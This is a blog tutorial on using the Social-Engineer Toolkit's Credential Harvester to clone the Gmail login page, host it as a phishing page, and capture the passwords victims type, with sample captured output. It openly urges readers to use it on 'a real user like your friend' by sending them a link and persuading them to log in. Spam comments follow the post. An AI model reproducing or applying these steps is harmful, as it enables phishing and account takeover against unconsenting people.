Never Ending Security

It starts all here

Hack gmail password with social engineering toolkit (SET)

Social Engineering Toolkit

Social engineering toolkit is the most powerful tool for performing social engineering attacks. It is the metasploit of social engineering in a way. It provides a very easy user interface to perform attacks like phishing, browser exploitation etc. In this tutorial we are going to see how it can be used to perform phishing attack to try to hack the gmail password of someone.

Credential Harvester Attack

Credential Harvester attack is one of the options available inside SET, that can create phishing pages and start a server to serve the pages and catch any user login data. Lets do it and see how it works.

Start SET in a terminal. It should come up with its welcome screen.

.M"""bgd `7MM"""YMM MMP""MM""YMM 
                ,MI    "Y   MM    `7 P'   MM   `7 
                `MMb.       MM   d        MM      
                  `YMMNq.   MMmmMM        MM      
                .     `MM   MM   Y  ,     MM      
                Mb     dM   MM     ,M     MM      
                P"Ybmmd"  .JMMmmmmMMM   .JMML.

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs:         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage:       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    Join us on in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.


 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit


Now for this particular attack type we need to select “Social-Engineering Attacks” from the main menu. Type 1 and press enter. It will again present with a menu that would look like this

Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

Over here we have the option to select from various kinds of social engineering attacks. For our purpose select option 2 thats “Website Attack Vectors”. Again will come another menu like below

1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

This time along with this menu, there would be some explanation about each attack. As can be seen the Credential Harvester Attack Method is there on number 3 which we are going to use. It is explained as

The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.

So select number 3 and proceed. It will present another menu like this

1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

Now over here we are going to clone to construct our phishing page. So select option 2.

[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:
[-] SET supports both HTTP and HTTPS
[-] Example:
set:webattack> Enter the url to clone:

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.

      Press <return> to continue

[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

On selecting option 2, it will ask for 2 important piece of information. The first is the ip address, to which it would submit the data and second is the url to clone which is in this case

So enter the details and press enter when it asks to press return. Now the credential harvester would start a web server on port 80 which would serve the page Open the ip address of the machine in the browser from some other machine or just localhost. For example if SET is running on machine with ip address then open that ip in a browser from another machine “;. Or give the ip address to someone else over the network :)

Now, when the username,password is entered and submitted, SET would capture the data and display on the terminal. Moreover, after capturing the data SET would redirect the user to the actual site, that is - - [15/Apr/2013 14:56:39] "GET / HTTP/1.1" 200 - - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 - - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: continue=
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-2825129499091793842
PARAM: ltmpl=default
PARAM: scc=1
PARAM: pstMsg=1
PARAM: dnConn=
PARAM: checkConnection=
PARAM: checkedDomains=youtube
PARAM: timeStmp=
PARAM: secTok=
PARAM: _utf8=?
PARAM: bgresponse=!A0KPFdMuBMNZHUQml6hMF2ywpQ8AAxYG6ioCp0BIO0i9C5ftMNPRDRHTXxtZBB9qRoqUjLWLXn3dAJbKr3pT1eJNOwSvoduAgjxCOgnH8u3KZWS0A9kO9pIXNZXJ77OdsqK0T66SEdQLC9QV7QI8op3SM6ldH3rKqEbikKatd9DbrD7QLx3NWHfFR5O6r7PCgCDebXNk56ww-4wiFFmne05oW0ZDMstszHdBd67Z5lleTbvO2544iGrszfYzA1AJU1djcawccdN4bK2WUP1BUPQL3fidQRha5YeNe2cq81e-81DO4AjNX7OfINtsm8zpeSWOX5tHDNZWCnVwz6X5ItbkYNsfZuo9PQvJ5etzTvg6gwCpCZUDtHGR8AwSgxjQsy_hKfuJEmFNmNXFpyUi0Tu_Dw1WckbMNvRcrAhsb682WRI616BFc3aNbwNwfhRC1D6L20oxXcpzshpXxMLQDQr5GoUC6V7FIoTF9ma6mYddyrxdoxmo4d2Vh2vtovJxcYVMNRJpPa-7vvG7Ml_TQC9QJpJ21B608tccYKQpE9FzCzvmVxLMo1SHpr-Q3HChWkx7y-yq4Ba9fkKvt7XuOaq0isbZKeF_y8N1DJqGYusajFb7-jMDkQpnn6uQ-Y1OqalGQ56KSjgyWckWzPnTQ65V5V0doSbmcds8pvkWLFLQ8WM6EDMdX5RT9v5H5fkeMTWadlrJyumtHeerC5fw8qp4G_ZzH8232qySHq21XWvLxcoUS0eXHd8bGn1IA84ZpCuMt7WwEWuXss2OIrf_pfN4-YM3pLtuPIhuAnGoKAJsXS7Sib2cX34mEIiuIeC0fw1CbVqHVRz2nVT8a_QvvAeIYh5HhCz0dbn_P2FE_gosd3wG6Abnh7d08orC0TbzaW61y7H2r0owwU_SRDUKoPmVhVtp-GwjEoEanv7eZ22RgrE
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
PARAM: rmShown=1

See the fields Email and Passwd, they contain the details typed by user. If you want to carry out this hack on a real user like your friend or someone, then you have to give them a link that they can open from their computer and access the SET clone of gmail.

If you have SET running on your local machine then you have to give your public ip address to the victim. He would open the link and get the login page of gmail. The rest of task is to persuade him to login through that page. If you are able to do so, then you get the login details. The credential harvester attack is not limited to just stealing the login data. It can capture any generic form submission.

Phishing attacks are very common in the form of spam emails. Hackers setup phishing pages on webhosts and then spread the links over email to users. The phishing pages includes simple email sites to bank logins and even more.


3 responses to “Hack gmail password with social engineering toolkit (SET)

  1. 1 May 2015 at 05:37

    Hello Web Admin, I noticed that your On-Page SEO is is missing a few factors, for one you do not use all three H tags in your post, also I notice that you are not using bold or italics properly in your SEO optimization. On-Page SEO means more now than ever since the new Google update: Panda. No longer are backlinks and simply pinging or sending out a RSS feed the key to getting Google PageRank or Alexa Rankings, You now NEED On-Page SEO. So what is good On-Page SEO?First your keyword must appear in the title.Then it must appear in the URL.You have to optimize your keyword and make sure that it has a nice keyword density of 3-5% in your article with relevant LSI (Latent Semantic Indexing). Then you should spread all H1,H2,H3 tags in your article.Your Keyword should appear in your first paragraph and in the last sentence of the page. You should have relevant usage of Bold and italics of your keyword.There should be one internal link to a page on your blog and you should have one image with an alt tag that has your keyword….wait there’s even more Now what if i told you there was a simple WordPress plugin that does all the On-Page SEO, and automatically for you? That’s right AUTOMATICALLY, just watch this 4minute video for more information at. Seo Plugin

  2. Psn Code Generator Hack 30 April 2015 at 10:22

    Regardless if you don’t use the video streaming,
    system a good idea to undertake lots of Blu-Ray video clips.

  3. poker boyaa 25 April 2015 at 14:02

    Excellеnt article! We are linking to this great content on our site.

    Keep up the greɑt writing.

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s